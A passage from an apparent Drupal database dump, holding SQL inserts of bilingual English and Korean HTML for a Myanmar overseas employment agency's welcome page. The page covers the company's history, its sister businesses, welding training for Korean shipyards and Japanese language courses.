style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공하고 돕고 있습니다</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일본으로 취업비자</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">연수비자로 가기</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">위해</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">필요한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">자격시험</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">(JLPT, JFT, NAT-TEST, TOP-J)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">합격할</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">수</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있도록</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">어학당도</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">개설</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">및 교육을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">지원하고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">저희는</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">”</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>뉴코멧</strong></span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>해외직업소개회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"><strong>”&nbsp;</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-bidi-font-weight:bold;mso-fareast-language:KO;\" lang=\"KO\">는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">미얀마에서</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">우수한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기능인력을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">배출하여</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">해외로</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">파견하는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비스를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공하기</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">위해</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">끊임없이</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">노력하고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span><o:p></o:p><o:p></o:p></p><p>&nbsp;</p>', '', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('page', 0, 1, 70, 'en', 0, '<h3>Welcome to Our Website \"NEW COMET TRADING AGENCY\"!!!!</h3><h3>안녕하세요.우리\"뉴코멧 영업 대행사\" 웹사이트 에서 환영합니다.</h3><img src=\"/sites/default/files/inline-images/new_comet_trading_agency_0.jpg\" data-align=\"center\" data-entity-uuid=\"42e9d2a3-e284-49bb-81cb-2510b37a5871\" data-entity-type=\"file\"><p><span style=\"font-size:14.0pt;line-height:107%;\">We, ``NEW COMET TRADING\'\' company, was established in 2004 and started operating with company registration number (295/2004-2005).</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">NEW COMET TRADING AGENCY Co.,Ltd (New Comet Overseas Employment Agency) license was obtained in 2023 and since then, the company has started to carry out service activities.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">&nbsp;We, ``NEW COMET TRADING AGENCY\'\' company, which is a brother company, such as, ZEYA NEW COMET Auto Sale &amp; Services Co.,Ltd, NEW COMET Co.,Ltd, have applied for vehicle import permits from the Ministry of Economy and Commerce, and have been working for more than 25 years in the business of buying, importing and selling various types of business trucks, tourism and transportation buses and machinery directly from Japan, and have paid the taxes set for the state. More than 100 employees were given employment opportunities.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">In addition, brother companies such as NEW COMET Construction Co.,Ltd, NEW ZAYYA SHWE PYI Construction Co.,Ltd, AUNG NAY WUN Construction Co.,Ltd and other companies have also successfully won tenders from government ministries and have provided employment opportunities to more than 200 employees.</span></p><p><span style=\"font-size:14.0pt;line-height:107%;\">Our company \"NEW COMET TRADING AGENCY “company is currently providing welding training courses to become qualified skilled workers at the Sinmalike Shipyard under the Ministry of Transport and Communications for ethnic brothers from all over Myanmar who want to work in Korea\'s shipyards and connect them with job opportunities.&nbsp;</span></p><p><o:p></o:p><span style=\"font-size:14.0pt;line-height:107%;\">In addition, we are connecting job opportunities for young people who want to work in countries such as Dubai, Malaysia, Singapore, Thailand, and Japan.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">We at NEW COMET TRADING AGENCY Co.Ltd, are assisting on responsible for learning about Japan\'s developed advanced technologies, cultures and expressing their personal abilities and goals for the young generation in Myanmar.&nbsp;</span></p><p><o:p></o:p><span style=\"font-size:14.0pt;line-height:107%;\">In order to successfully pass the qualification tests (JLPT, JFT, NAT-TEST, TOP-J) required to go to Japan with a Work Visa and Training Visa, we are opening language training schools and providing teaching support.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">We, \"NEW COMET TRADING AGENCY\" company, is constantly striving to provide services that produce talented skilled workers from Myanmar and send them to foreign countries.</span></p><p>&nbsp;</p><h3>안녕하세요.우리 웹사이트 \"뉴코멧 영업 대행사\" &nbsp;에서 환영합니다.</h3><p>&nbsp;</p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">저희</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\"> ``New Comet Trading\'\'&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">회사는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\"> 2004</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">년에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">설립되어</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">사업자등록번호</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">(295/2004-2005)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">로</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">영업을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">시작하였습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">뉴코멧무역대행</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\"> 2023</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">년</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">뉴코멧</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">외국인고용업</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">면허를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">취득하여</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비스</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">활동을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">시작하였습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">저희 <strong>뉴코멧</strong></span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>해외직업소개회사</strong>&nbsp;</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">\"New Comet Overseas Employment Agency\"</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">는자매</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">회사인&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-spacerun:yes;\" lang=\"KO\"> </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>제야뉴코멧 자동차 판매 및 서비스 회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">, </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>뉴코멧회사</strong>등</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기업들과</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">협력하여</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">경제통상자원부에서&nbsp;</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-spacerun:yes;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">차량</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">수입허가를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">신청했고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">각종</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">상용트럭</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">, </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">관광</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">산업 및</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">운송에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">사용되는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">다양한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">유형의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">버스</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">및</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기계를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일본에서</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직접</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">구매 판매하는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">사업을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\"> 25</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">년</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">이상&nbsp;</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-spacerun:yes;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">종사해</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">왔고 나라를 위한 정한 세금들을 냈습니다</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">. </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">게다가</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun 